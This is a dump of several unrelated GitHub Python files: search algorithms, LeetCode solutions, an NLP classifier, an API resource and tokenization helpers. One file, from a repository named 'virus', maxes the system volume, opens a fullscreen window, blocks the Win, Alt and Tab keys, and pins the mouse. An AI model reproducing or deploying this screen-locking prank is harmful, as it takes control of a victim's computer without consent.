= trip[1]\n value = trip[2]\n #txt = txt +\"\\n\" + tabs + (\"%s <%s> %s\" % (ind0, prop, value))\n txt = txt + \"\\n\" + tabs + (\"%s%s%s\" % (renderNL(ind0), renderNL(prop), renderNL(value)))\n if issubclass(prop, owl.ObjectProperty) and (value not in visited_nodes):\n txt = txt + traverseOntoMark_Overleaf(value, tabs=tabs+\"\\t\", 
visited_nodes=visited_nodes)\n return txt\n if len(triples) == 0:\n return \";\"\n\n\ndef renderNL(x):\n # if x is individual\n if isinstance(x, owl.Thing):\n return \" [%s](%s)\" % (x.PhenoScript_original_class[0], x.PhenoScript_original_class[0].iri)\n elif issubclass(x, owl.ObjectProperty) or issubclass(x, owl.DatatypeProperty):\n dict={obo.BFO_0000051 :',', obo.BFO_0000050 : ' of', obo.RO_0000053 : ':', obo.RO_0000052 : ' of', pato.increased_in_magnitude_relative_to : ' larger than', pato.decreased_in_magnitude_relative_to : ' smaller than'}\n if x in dict:\n return dict[x]\n else:\n return \" [%s](%s)\" % (x.label.first(), x.iri)\n elif issubclass(x, owl.AnnotationProperty):\n return \"\"\n elif isinstance(x, (int, float)):\n return \" %s\" % str(x)\n elif isinstance(x, str):\n return x","repo_name":"sergeitarasov/PhenoScript","sub_path":"archive/convert_to_NL_Overleaf.py","file_name":"convert_to_NL_Overleaf.py","file_ext":"py","file_size_in_byte":9868,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"25757928611","text":"def iterative_deepening_search(graph, start, goal):\n depth = 0\n time = 0\n explore_nodes_list = []\n\n while True:\n r_time, r_explored_nodes, r_path = depth_limited_tree_search(graph, start, goal, depth)\n\n if r_time is None:\n return None, None, None # failure\n\n explore_nodes_list.append(r_explored_nodes)\n time += r_time\n depth += 1\n\n if r_path is not None:\n return time, explore_nodes_list, r_path # solution\n\n\n\"\"\"\nDepth limited tree search (DLTS for short)\nInput: the maze's info as a graph, start state, goal state, limit depth\nReturn: - success: the time to escape the maze, the list of explored nodes, the list of nodes on the path found\n - cutoff: the time to try to escape the maze within the limit depth, the list of explored nodes, None\n - failure: None, None, None\n\"\"\"\ndef depth_limited_tree_search(graph, start, goal, depth):\n if start == goal:\n return 1, [start], [start]\n\n explored = []\n current_path = []\n on_current_path = dict()\n for state in graph:\n on_current_path[state] = False\n\n return recursive_depth_limited_tree_search(graph, start, goal, depth, explored, current_path, on_current_path)\n\n\n\"\"\"\nRecursive depth limited tree search (RDLTS for short): Help the DLTS algorithm to explore nodes recursively.\nInput: the maze's info as a graph, start state, goal state, limit depth,\n the list of explored nodes, the list of nodes on the current path,\n the dictionary for checking if a node is on the currentpath\nReturn: - success: the time to escape the maze, the list of explored nodes, the list of nodes on the path found\n - cutoff: the time to try to escape the maze within the limit depth, the list of explored nodes, None\n - failure: None, None, None\n\"\"\"\ndef recursive_depth_limited_tree_search(graph, state, goal, depth, explored, current_path, on_current_path):\n explored.append(state)\n current_path.append(state)\n on_current_path[state] = True\n\n if state == goal:\n return len(explored), explored, current_path # solution\n elif depth == 0:\n return len(explored), explored, None # cutoff\n\n cutoff_occured = False\n\n child_state_list = sorted(graph[state])\n for child_state in child_state_list:\n if not on_current_path[child_state]:\n time, explored_nodes, path = recursive_depth_limited_tree_search(graph, child_state, goal, depth - 1,\n explored, current_path, on_current_path)\n\n if time is None or path is None:\n on_current_path[current_path.pop()] = 
False\n\n if time is not None and path is None:\n cutoff_occured = True\n elif path is not None:\n return time, explored_nodes, path # not failure\n\n if cutoff_occured:\n return len(explored), explored, None # cutoff\n\n return None, None, None # failure\n","repo_name":"kieuconghau/search-strategies","sub_path":"18127259/SOURCE/IDS.py","file_name":"IDS.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73888297012","text":"\"\"\"\nGiven a non-empty binary tree, find the maximum path sum.\n\nFor this problem, a path is defined as any sequence of nodes from some starting node to any node in the tree along the parent-child connections. The path must contain at least one node and does not need to go through the root.\n\n\"\"\"\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def maxPathSum(self, root: TreeNode) -> int:\n self.ans = float(\"-inf\")\n def traverse(node): \n if not node:\n return 0\n l = traverse(node.left)\n r = traverse(node.right)\n # find the max of path sum (l+r+node) need the max of left subtree and max of right subtree\n self.ans = max(self.ans, l+r+node.val) \n # return max sum for the parent node (left/right subtree)\n return max(l+node.val, r+node.val, 0) \n traverse(root)\n return self.ans\n \n def maxPathSum(self, root: Optional[TreeNode]) -> int:\n res = float(\"-inf\")\n \n def helper(node):\n nonlocal res\n # if not root, return 0\n if not node:\n return 0\n # get the max path sum from left subtree\n l = max(0, helper(node.left))\n # get the max path sum from right subtree\n r = max(0, helper(node.right))\n # for the current node, compare the max sum with left+right+node.val\n res = max(res, l+r+node.val)\n \n # return max(left, right) + node.val to the parent and do not return neg value\n return max(l, r) + node.val\n \n helper(root)\n return res\n \nif __name__ == '__main__':\n s = Solution()\n print(s.maxPathSum([-10,9,20,null,null,15,7]))\n \n \n \n ","repo_name":"xiaofanc/leetcode","sub_path":"0124-binary-tree-maximum-path-sum.py","file_name":"0124-binary-tree-maximum-path-sum.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14520154935","text":"#production Toretto Company\r\nimport keyboard\r\nimport pygame\r\nimport sys\r\nimport time\r\nimport ctypes\r\n\r\nSendInput = ctypes.windll.user32.SendInput\r\n\r\nPUL = ctypes.POINTER(ctypes.c_ulong)\r\n\r\nclass KeyBdInput(ctypes.Structure):\r\n _fields_ = [\r\n (\"wVk\", ctypes.c_ushort),\r\n (\"wScan\", ctypes.c_ushort),\r\n (\"dwFlags\", ctypes.c_ulong),\r\n (\"time\", ctypes.c_ulong),\r\n (\"dwExtraInfo\", PUL)\r\n ]\r\n\r\nclass HardwareInput(ctypes.Structure):\r\n _fields_ = [\r\n (\"uMsg\", ctypes.c_ulong),\r\n (\"wParamL\", ctypes.c_short),\r\n (\"wParamH\", ctypes.c_ushort)\r\n ]\r\n\r\nclass MouseInput(ctypes.Structure):\r\n _fields_ = [\r\n (\"dx\", ctypes.c_long),\r\n (\"dy\", ctypes.c_long),\r\n (\"mouseData\", ctypes.c_ulong),\r\n (\"dwFlags\", ctypes.c_ulong),\r\n (\"time\",ctypes.c_ulong),\r\n (\"dwExtraInfo\", PUL)\r\n ]\r\n\r\nclass Input_I(ctypes.Union):\r\n _fields_ = [\r\n (\"ki\", KeyBdInput),\r\n (\"mi\", MouseInput),\r\n (\"hi\", HardwareInput)\r\n ]\r\n\r\nclass Input(ctypes.Structure):\r\n _fields_ = [\r\n (\"type\", ctypes.c_ulong),\r\n (\"ii\", Input_I)\r\n 
]\r\n\r\nclass Keyboard:\r\n VK_BACKSPACE = 0x08\r\n VK_ENTER = 0x0D\r\n VK_CTRL = 0x11\r\n VK_ALT = 0x12\r\n VK_0 = 0x30\r\n VK_1 = 0x31\r\n VK_2 = 0x32\r\n VK_3 = 0x33\r\n VK_4 = 0x34\r\n VK_5 = 0x35\r\n VK_6 = 0x36\r\n VK_7 = 0x37\r\n VK_8 = 0x38\r\n VK_9 = 0x39\r\n VK_A = 0x41\r\n VK_B = 0x42\r\n VK_C = 0x43\r\n VK_D = 0x44\r\n VK_E = 0x45\r\n VK_F = 0x46\r\n VK_G = 0x47\r\n VK_H = 0x48\r\n VK_I = 0x49\r\n VK_J = 0x4A\r\n VK_K = 0x4B\r\n VK_L = 0x4C\r\n VK_M = 0x4D\r\n VK_N = 0x4E\r\n VK_O = 0x4F\r\n VK_P = 0x50\r\n VK_Q = 0x51\r\n VK_R = 0x52\r\n VK_S = 0x53\r\n VK_T = 0x54\r\n VK_U = 0x55\r\n VK_V = 0x56\r\n VK_W = 0x57\r\n VK_X = 0x58\r\n VK_Y = 0x59\r\n VK_Z = 0x5A\r\n VK_VOLUME_MUTE = 0xAD\r\n VK_VOLUME_DOWN = 0xAE\r\n VK_VOLUME_UP = 0xAF\r\n VK_MEDIA_NEXT_TRACK = 0xB0\r\n VK_MEDIA_PREV_TRACK = 0xB1\r\n VK_MEDIA_PLAY_PAUSE = 0xB3\r\n VK_MEDIA_STOP = 0xB2\r\n VK_LBUTTON = 0x01\r\n VK_RBUTTON = 0x02\r\n VK_CANCEL = 0x03\r\n VK_MBUTTON = 0x04\r\n VK_XBUTTON1 = 0x05\r\n VK_XBUTTON2 = 0x06\r\n VK_BACK = 0x08\r\n VK_TAB = 0x09\r\n VK_CLEAR = 0x0C\r\n VK_RETURN = 0x0D\r\n VK_SHIFT = 0x10\r\n VK_CONTROL = 0x11\r\n VK_MENU = 0x12\r\n VK_PAUSE = 0x13\r\n VK_CAPITAL = 0x14\r\n VK_KANA = 0x15\r\n VK_HANGUEL = 0x15\r\n VK_HANGUL = 0x15\r\n VK_JUNJA = 0x17\r\n VK_FINAL = 0x18\r\n VK_HANJA = 0x19\r\n VK_KANJI = 0x19\r\n VK_ESCAPE = 0x1B\r\n VK_CONVERT = 0x1C\r\n VK_NONCONVERT = 0x1D\r\n VK_ACCEPT = 0x1E\r\n VK_MODECHANGE = 0x1F\r\n VK_SPACE = 0x20\r\n VK_PRIOR = 0x21\r\n VK_NEXT = 0x22\r\n VK_END = 0x23\r\n VK_HOME = 0x24\r\n VK_LEFT = 0x25\r\n VK_UP = 0x26\r\n VK_RIGHT = 0x27\r\n VK_DOWN = 0x28\r\n VK_SELECT = 0x29\r\n VK_PRINT = 0x2A\r\n VK_EXECUTE = 0x2B\r\n VK_SNAPSHOT = 0x2C\r\n VK_INSERT = 0x2D\r\n VK_DELETE = 0x2E\r\n VK_HELP = 0x2F\r\n VK_LWIN = 0x5B\r\n VK_RWIN = 0x5C\r\n VK_APPS = 0x5D\r\n VK_SLEEP = 0x5F\r\n VK_NUMPAD0 = 0x60\r\n VK_NUMPAD1 = 0x61\r\n VK_NUMPAD2 = 0x62\r\n VK_NUMPAD3 = 0x63\r\n VK_NUMPAD4 = 0x64\r\n VK_NUMPAD5 = 0x65\r\n VK_NUMPAD6 = 0x66\r\n VK_NUMPAD7 = 0x67\r\n VK_NUMPAD8 = 0x68\r\n VK_NUMPAD9 = 0x69\r\n VK_MULTIPLY = 0x6A\r\n VK_ADD = 0x6B\r\n VK_SEPARATOR = 0x6C\r\n VK_SUBTRACT = 0x6D\r\n VK_DECIMAL = 0x6E\r\n VK_DIVIDE = 0x6F\r\n VK_F1 = 0x70\r\n VK_F2 = 0x71\r\n VK_F3 = 0x72\r\n VK_F4 = 0x73\r\n VK_F5 = 0x74\r\n VK_F6 = 0x75\r\n VK_F7 = 0x76\r\n VK_F8 = 0x77\r\n VK_F9 = 0x78\r\n VK_F10 = 0x79\r\n VK_F11 = 0x7A\r\n VK_F12 = 0x7B\r\n VK_F13 = 0x7C\r\n VK_F14 = 0x7D\r\n VK_F15 = 0x7E\r\n VK_F16 = 0x7F\r\n VK_F17 = 0x80\r\n VK_F18 = 0x81\r\n VK_F19 = 0x82\r\n VK_F20 = 0x83\r\n VK_F21 = 0x84\r\n VK_F22 = 0x85\r\n VK_F23 = 0x86\r\n VK_F24 = 0x87\r\n VK_NUMLOCK = 0x90\r\n VK_SCROLL = 0x91\r\n VK_LSHIFT = 0xA0\r\n VK_RSHIFT = 0xA1\r\n VK_LCONTROL = 0xA2\r\n VK_RCONTROL = 0xA3\r\n VK_LMENU = 0xA4\r\n VK_RMENU = 0xA5\r\n VK_BROWSER_BACK = 0xA6\r\n VK_BROWSER_FORWARD = 0xA7\r\n VK_BROWSER_REFRESH = 0xA8\r\n VK_BROWSER_STOP = 0xA9\r\n VK_BROWSER_SEARCH = 0xAA\r\n VK_BROWSER_FAVORITES = 0xAB\r\n VK_BROWSER_HOME = 0xAC\r\n VK_LAUNCH_MAIL = 0xB4\r\n VK_LAUNCH_MEDIA_SELECT = 0xB5\r\n VK_LAUNCH_APP1 = 0xB6\r\n VK_LAUNCH_APP2 = 0xB7\r\n VK_OEM_1 = 0xBA\r\n VK_OEM_PLUS = 0xBB\r\n VK_OEM_COMMA = 0xBC\r\n VK_OEM_MINUS = 0xBD\r\n VK_OEM_PERIOD = 0xBE\r\n VK_OEM_2 = 0xBF\r\n VK_OEM_3 = 0xC0\r\n VK_OEM_4 = 0xDB\r\n VK_OEM_5 = 0xDC\r\n VK_OEM_6 = 0xDD\r\n VK_OEM_7 = 0xDE\r\n VK_OEM_8 = 0xDF\r\n VK_OEM_102 = 0xE2\r\n VK_PROCESSKEY = 0xE5\r\n VK_PACKET = 0xE7\r\n VK_ATTN = 0xF6\r\n VK_CRSEL = 0xF7\r\n VK_EXSEL = 0xF8\r\n VK_EREOF = 0xF9\r\n VK_PLAY = 0xFA\r\n VK_ZOOM = 0xFB\r\n VK_NONAME 
= 0xFC\r\n VK_PA1 = 0xFD\r\n VK_OEM_CLEAR = 0xFE\r\n\r\n def keyDown(keyCode):\r\n extra = ctypes.c_ulong(0)\r\n ii_ = Input_I()\r\n ii_.ki = KeyBdInput(keyCode, 0x48, 0, 0, ctypes.pointer(extra) )\r\n x = Input( ctypes.c_ulong(1), ii_ )\r\n SendInput(1, ctypes.pointer(x), ctypes.sizeof(x))\r\n\r\n def keyUp(keyCode):\r\n extra = ctypes.c_ulong(0)\r\n ii_ = Input_I()\r\n ii_.ki = KeyBdInput(keyCode, 0x48, 0x0002, 0, ctypes.pointer(extra) )\r\n x = Input( ctypes.c_ulong(1), ii_ )\r\n SendInput(1, ctypes.pointer(x), ctypes.sizeof(x))\r\n\r\n def key(keyCode, length = 0):\r\n Keyboard.keyDown(keyCode)\r\n time.sleep(length)\r\n Keyboard.keyUp(keyCode)\r\n\r\n\r\nclass Sound:\r\n __current_volume = None\r\n\r\n @staticmethod\r\n def current_volume():\r\n if Sound.__current_volume is None:\r\n return 0\r\n else:\r\n return Sound.__current_volume\r\n\r\n @staticmethod\r\n def __set_current_volume(volume):\r\n if volume > 100:\r\n Sound.__current_volume = 100\r\n elif volume < 0:\r\n Sound.__current_volume = 0\r\n else:\r\n Sound.__current_volume = volume\r\n\r\n\r\n __is_muted = False\r\n\r\n @staticmethod\r\n def is_muted():\r\n return Sound.__is_muted\r\n\r\n\r\n @staticmethod\r\n def __track():\r\n if Sound.__current_volume == None:\r\n Sound.__current_volume = 0\r\n for i in range(0, 50):\r\n Sound.volume_up()\r\n\r\n\r\n @staticmethod\r\n def mute():\r\n Sound.__track()\r\n Sound.__is_muted = (not Sound.__is_muted)\r\n Keyboard.key(Keyboard.VK_VOLUME_MUTE)\r\n\r\n @staticmethod\r\n def volume_up():\r\n Sound.__track()\r\n Sound.__set_current_volume(Sound.current_volume() + 2)\r\n Keyboard.key(Keyboard.VK_VOLUME_UP)\r\n\r\n @staticmethod\r\n def volume_down():\r\n Sound.__track()\r\n Sound.__set_current_volume(Sound.current_volume() - 2)\r\n Keyboard.key(Keyboard.VK_VOLUME_DOWN)\r\n\r\n\r\n @staticmethod\r\n def volume_set(amount):\r\n Sound.__track()\r\n\r\n if Sound.current_volume() > amount:\r\n for i in range(0, int((Sound.current_volume() - amount) / 2)):\r\n Sound.volume_down()\r\n else:\r\n for i in range(0, int((amount - Sound.current_volume()) / 2)):\r\n Sound.volume_up()\r\n\r\n @staticmethod\r\n def volume_min():\r\n Sound.volume_set(0)\r\n\r\n @staticmethod\r\n def volume_max():\r\n Sound.volume_set(100)\r\n\r\n\r\ndef start_screen():\r\n Sound.volume_max()\r\n pygame.init()\r\n pygame.mixer.init()\r\n screen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\r\n pygame.display.set_caption('дурашка')\r\n\r\n fps = 7200\r\n clock = pygame.time.Clock()\r\n keyboard.block_key('win')\r\n keyboard.block_key('alt')\r\n keyboard.block_key('tab')\r\n # for i in '1234567890-=qwertyuiop[]asdfghjkl;\\zxcvbnm,./':\r\n # keyboard.block_key(i)\r\n\r\n screen.fill('black')\r\n pygame.display.flip()\r\n im = pygame.image.load('python_org.png')\r\n flag = False\r\n\r\n while True:\r\n clock.tick(fps)\r\n screen.blit(im, (0, 0))\r\n pygame.mouse.set_pos((500, 500))\r\n\r\n im = pygame.transform.scale(im, (1920, 1080))\r\n screen.blit(im, (0, 0))\r\n pygame.display.flip()\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n terminate()\r\n\r\n if not flag:\r\n landing = pygame.mixer.Sound(\"python_org.mp3\")\r\n landing.play(maxtime=2000)\r\n flag = True\r\n\r\n\r\ndef terminate():\r\n pygame.quit()\r\n sys.exit()\r\n\r\n\r\nstart_screen()","repo_name":"Wapppp12q/virus","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
+{"seq_id":"70619769014","text":"import io\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn import metrics\nfrom sklearn import linear_model\nfrom sklearn import model_selection\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\n\n\ndef load_vectors(fname):\n fin = io.open(\n fname, mode=\"r\", encoding=\"utf-8\", newline=\"\\n\", errors=\"ignore\"\n )\n # n, d = map(int, fin.readline().split())\n data = {}\n for line in fin:\n tokens = line.rstrip().split(\" \")\n data[tokens[0]] = list(map(float, tokens[1:]))\n\n return data\n\n\ndef sentence_to_vec(sent, embedding_dict, stop_words, tokenizer):\n # convert the sentence to string and lowercase it\n words = str(sent).lower()\n\n # tokenize the sentence\n words = tokenizer(words)\n\n # remove the stopwords\n words = [w for w in words if w not in stop_words]\n\n # keep only alpha-numeric tokens\n words = [w for w in words if w.isalpha()]\n\n # empty list to store word_embeddings\n word_embeddings = []\n for w in words:\n # for every word, fetch the embedding vector and\n # append it in the word embedding list\n if w in embedding_dict:\n word_embeddings.append(embedding_dict[w])\n\n # if we don't have any words, return vector of zeros\n if len(word_embeddings) == 0:\n return np.zeros(300)\n\n # convert the embeddings to array\n word_embeddings = np.array(word_embeddings)\n\n # calculate the sum over the rows\n sent_vec = np.sum(word_embeddings, axis=0)\n\n # return the normalized vector\n return sent_vec / np.linalg.norm(sent_vec)\n\n\nif __name__ == \"__main__\":\n # read the training data\n df = pd.read_csv(\"../data/train_folds.csv\")\n print(df.head(2))\n\n # load embeddings into the memory\n print(\"Loading embeddings...\")\n embeddings = load_vectors(\"../data/glove.6B.300d.txt\")\n\n # create sentence embeddings\n print(\"Creating sentence vectors...\")\n vectors = []\n for review in df.review.values:\n sent_vec = sentence_to_vec(\n review, embeddings, stop_words=[], tokenizer=word_tokenize\n )\n vectors.append(sent_vec)\n\n vectors = np.array(vectors)\n\n # fetch lables\n y = df.sentiment.values\n\n # initiate the stratified kfold\n skf = model_selection.StratifiedKFold(n_splits=5)\n\n # iterate through the folds\n for f_, (t_, v_) in enumerate(skf.split(X=vectors, y=y)):\n print(f\"Training fold: {f_}\")\n xtrain = vectors[t_, :]\n ytrain = y[t_]\n\n xvalid = vectors[v_, :]\n yvalid = y[v_]\n\n # initialize logistic regression model\n model = linear_model.LogisticRegression()\n\n # fit the model\n model.fit(xtrain, ytrain)\n\n # make predictions on the validation data\n preds = model.predict(xvalid)\n pred_proba = model.predict_proba(xvalid)[:, 1]\n\n # calculate accuracy and ROC score\n accuracy = metrics.accuracy_score(yvalid, preds)\n auc = metrics.roc_auc_score(yvalid, pred_proba)\n\n print(f\"Accuracy: {accuracy:.5f}, ROC-AUC: {auc:.5f}\")\n print(\"\")\n","repo_name":"LakshyaMalhotra/toy-projects-nlp","sub_path":"imdb-sentiment-analysis/good-old-nlp/sentence_vector.py","file_name":"sentence_vector.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73888450612","text":"\"\"\"\ndp[i][k]: ways to form target[0:i] using word[0:k]\n1. 
we do not use word[k] to form target[i]\ndp[i][k] = dp[i][k-1]\n\n2 we use word[k] to form target[i]\ndp[i][k] += dp[i-1][k-1] * count(how many word[k] == target[i])\n\nn = len(target), m = len(words[0])\nreturn dp[n][m]\n\nsol 2:\nres[j] means the number of ways to form target j first characters.\n\n\"\"\"\n\nclass Solution:\n def numWays(self, words, target):\n n, mod = len(target), 10**9 + 7\n res = [1] + [0] * n\n # print(\"res -->\", res)\n for i in range(len(words[0])):\n # print(\"i\", i)\n count = collections.Counter(w[i] for w in words)\n # print(\"count -->\", count)\n for j in range(min(i, n - 1), -1, -1):\n # print(\"j: \", j)\n res[j + 1] += res[j] * count[target[j]] % mod\n # print(\"res: \", res)\n return res[n] % mod\n\nclass Solution:\n # TLE\n def numWays(self, words: List[str], target: str) -> int: \n size = len(words[0])\n m = 10**9+7\n # number of ways to form target[i:] using words[..][j:]\n @cache\n def dp(i, j): \n # base case: there is one way not to put any characters\n if i == len(target):\n return 1\n # base case: empty string cannot make target\n if j == size:\n return 0\n res = 0\n # count the occ of target[i] in words[..][j]\n # use column j\n cnt = 0\n for word in words:\n if word[j] == target[i]:\n cnt += 1\n # for the current character, there is cnt ways\n res += cnt * dp(i+1, j+1)\n\n # skip column j\n res += dp(i, j+1)\n\n res = res % m\n return res\n return dp(0, 0)\n\nclass Solution:\n # bottom-up DP\n def numWays(self, words: List[str], target: str) -> int: \n size = len(words[0])\n m = 10**9+7\n count = [[0] * 26 for _ in range(size)]\n # count number of chars in position j: O(nk)\n for word in words:\n for j in range(size):\n count[j][ord(word[j]) - ord('a')] += 1\n # number of ways to form target[i:] using words[..][j:]: O(mk)\n @cache\n def dp(i, j): \n # base case: there is one way not to put any characters\n if i == len(target):\n return 1\n # base case: empty string cannot make target\n if j == size:\n return 0\n res = 0\n # count the occ of target[i] in words[..][j]\n # use column j\n # cnt = 0\n # for word in words:\n # if word[j] == target[i]:\n # cnt += 1\n cnt = count[j][ord(target[i]) - ord('a')]\n # for the current character, there is cnt ways\n res += cnt * dp(i+1, j+1)\n\n # skip column j\n res += dp(i, j+1)\n\n res = res % m\n return res\n return dp(0, 0)\n \nif __name__ == '__main__':\n\ts = Solution()\n\tprint(s.numWays([\"acca\",\"bbbb\",\"caca\"], \"aba\")) # 6\n\n\n ","repo_name":"xiaofanc/leetcode","sub_path":"1639-ways-to-form-a-target-string-given-dict.py","file_name":"1639-ways-to-form-a-target-string-given-dict.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20130604725","text":"import inspect\nfrom utils.log import logger as log\nthisFilename = __file__.split(\"/\")[-1]\n\nfrom database.user.user import DBUser\nfrom source.user.add_user import AddUserResource\n\ndbu = DBUser()\naur = AddUserResource()\n\nclass GetUserResource:\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def convertMongoDBObjectsToObjects(self, user: \"list of dict\") -> \"list of dict\":\n user[\"_id\"] = user[\"_id\"][\"$oid\"]\n if user[\"baseLocation\"]:\n user[\"baseLocation\"] = user[\"baseLocation\"][\"$oid\"]\n for otherLocation in user[\"otherLocations\"]:\n otherLocation[\"locationId\"] = otherLocation[\"locationId\"][\"$oid\"]\n otherLocation[\"timeline\"][\"begin\"] = 
otherLocation[\"timeline\"][\"begin\"][\"$date\"]\n otherLocation[\"timeline\"][\"end\"] = otherLocation[\"timeline\"][\"end\"][\"$date\"]\n for nonAvailability in user[\"nonAvailability\"]:\n nonAvailability[\"timeline\"][\"begin\"] = nonAvailability[\"timeline\"][\"begin\"][\"$date\"]\n nonAvailability[\"timeline\"][\"end\"] = nonAvailability[\"timeline\"][\"end\"][\"$date\"]\n for project in user[\"access\"][\"projects\"]:\n project[\"projectId\"] = project[\"projectId\"][\"$oid\"]\n for milestone in project[\"milestones\"]:\n milestone[\"milestoneId\"] = milestone[\"milestoneId\"][\"$oid\"]\n milestone[\"pulses\"] = [pulse[\"$oid\"] for pulse in milestone[\"pulses\"]]\n if user[\"meta\"][\"addedBy\"]:\n user[\"meta\"][\"addedBy\"] = user[\"meta\"][\"addedBy\"][\"$oid\"]\n if user[\"meta\"][\"addedOn\"]:\n user[\"meta\"][\"addedOn\"] = user[\"meta\"][\"addedOn\"][\"$date\"]\n if user[\"meta\"][\"lastSeen\"]:\n user[\"meta\"][\"lastSeen\"] = user[\"meta\"][\"lastSeen\"][\"$date\"]\n return user\n\n \"\"\"\n REQUEST:\n \"username\": str\n \"displayname\": str\n \"\"\"\n def on_get(self, req, resp):\n responseObj = {\n \"responseId\": 111,\n \"message\": \"\",\n \"data\": {}\n }\n try:\n # 01. get user by username\n user = dbu.getUserByUsername(req.params[\"kartoon-fapi-incoming\"][\"username\"])\n # 02. if user does not exist\n if not user:\n # 02. 01. add user\n aur.addUser(\n req.params[\"kartoon-fapi-incoming\"][\"username\"],\n req.params[\"kartoon-fapi-incoming\"][\"displayname\"],\n None\n )\n # 02. 02. get added user by username\n user = dbu.getUserByUsername(req.params[\"kartoon-fapi-incoming\"][\"username\"])\n # 03. update users' last seen\n dbu.updateLastSeen(user[\"_id\"][\"$oid\"])\n # 04. clean up mongo objects\n user = self.convertMongoDBObjectsToObjects(user)\n # 05. attach user document in response\n responseObj[\"data\"] = user\n # 06. set responseId to success\n responseObj[\"responseId\"] = 211\n except Exception as ex:\n log.error((thisFilename, inspect.currentframe().f_code.co_name), exc_info=True)\n responseObj[\"message\"] = str(ex)\n resp.media = responseObj\n","repo_name":"kartikeybhardwaj/circuit-bapi","sub_path":"source/user/get_user.py","file_name":"get_user.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33738147261","text":"import logging\n\nfrom rxn.utilities.files import (\n PathLike,\n dump_list_to_file,\n iterate_lines_from_file,\n raise_if_paths_are_identical,\n)\n\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n\ndef detokenize_class(tokenized_class: str) -> str:\n \"\"\"\n Function performing a detokenization of the reaction class used in the Transformer classification\n model. E.g. 
'1 1.2 1.2.3' -> 1.2.3\n\n Args:\n tokenized_class: str to detokenize\n\n Raises:\n ValueError: if the input string format is not correct\n \"\"\"\n if tokenized_class == \"0\":\n return tokenized_class\n\n splitted_class = tokenized_class.split(\" \")\n if len(splitted_class) == 1 and len(splitted_class[0].split(\".\")) == 3:\n # here the class is already detokenized\n return tokenized_class\n if len(splitted_class) != 3:\n raise ValueError(\n f'The class to be detokenized, \"{tokenized_class}\", is probably not in the correct format.'\n )\n return splitted_class[-1]\n\n\ndef tokenize_class(detokenized_class: str) -> str:\n \"\"\"\n Function performing a tokenization of the reaction class used in the Transformer classification\n model. E.g. '1.2.3' -> '1 1.2 1.2.3'\n\n Args:\n detokenized_class: str to tokenize\n\n Raises:\n ValueError: if the input string format is not correct\n \"\"\"\n if detokenized_class == \"0\":\n return detokenized_class\n\n splitted_class = detokenized_class.split(\".\")\n if len(splitted_class) == 4 and len(detokenized_class.split(\" \")) == 3:\n # here the class is already tokenized\n return detokenized_class\n if len(splitted_class) != 3:\n raise ValueError(\n f'The class to be tokenized, \"{detokenized_class}\", is probably not in the correct format.'\n )\n a, b, _ = splitted_class\n return f\"{a} {a}.{b} {detokenized_class}\"\n\n\ndef tokenize_class_line(class_line: str, invalid_placeholder: str) -> str:\n try:\n return tokenize_class(class_line)\n except ValueError:\n logger.debug(f'Error when tokenizing the class \"{class_line}\"')\n return invalid_placeholder\n\n\ndef detokenize_class_line(class_line: str, invalid_placeholder: str) -> str:\n try:\n return detokenize_class(class_line)\n except ValueError:\n logger.debug(f'Error when detokenizing the class \"{class_line}\"')\n return invalid_placeholder\n\n\ndef detokenize_classification_file(\n input_file: PathLike, output_file: PathLike, invalid_placeholder: str = \"\"\n) -> None:\n raise_if_paths_are_identical(input_file, output_file)\n logger.info(f'Detokenizing \"{input_file}\" -> \"{output_file}\".')\n\n detokenized = (\n detokenize_class_line(line, invalid_placeholder)\n for line in iterate_lines_from_file(input_file)\n )\n dump_list_to_file(detokenized, output_file)\n\n\ndef tokenize_classification_file(\n input_file: PathLike, output_file: PathLike, invalid_placeholder: str = \"\"\n) -> None:\n raise_if_paths_are_identical(input_file, output_file)\n logger.info(f'Tokenizing \"{input_file}\" -> \"{output_file}\".')\n\n tokenized = (\n tokenize_class_line(line, invalid_placeholder)\n for line in iterate_lines_from_file(input_file)\n )\n dump_list_to_file(tokenized, output_file)\n\n\ndef classification_string_is_tokenized(classification_line: str) -> bool:\n \"\"\"\n Whether a classification line is tokenized or not.\n\n Args:\n classification_line: line to inspect\n\n Raises:\n ValueError: for errors in tokenization or detokenization\n \"\"\"\n detokenized = detokenize_class(classification_line)\n tokenized = tokenize_class(detokenized)\n return classification_line == tokenized\n\n\ndef classification_file_is_tokenized(filepath: PathLike) -> bool:\n \"\"\"\n Whether a file contains tokenized classes or not.\n '1.2.3' -> '1 1.2 1.2.3'\n\n By default, this looks at the first non-empty line of the file only!\n\n Raises:\n ValueError: for errors in tokenization or detokenization\n RuntimeError: for empty files or files with empty lines only.\n\n Args:\n filepath: path to the file.\n \"\"\"\n for line in 
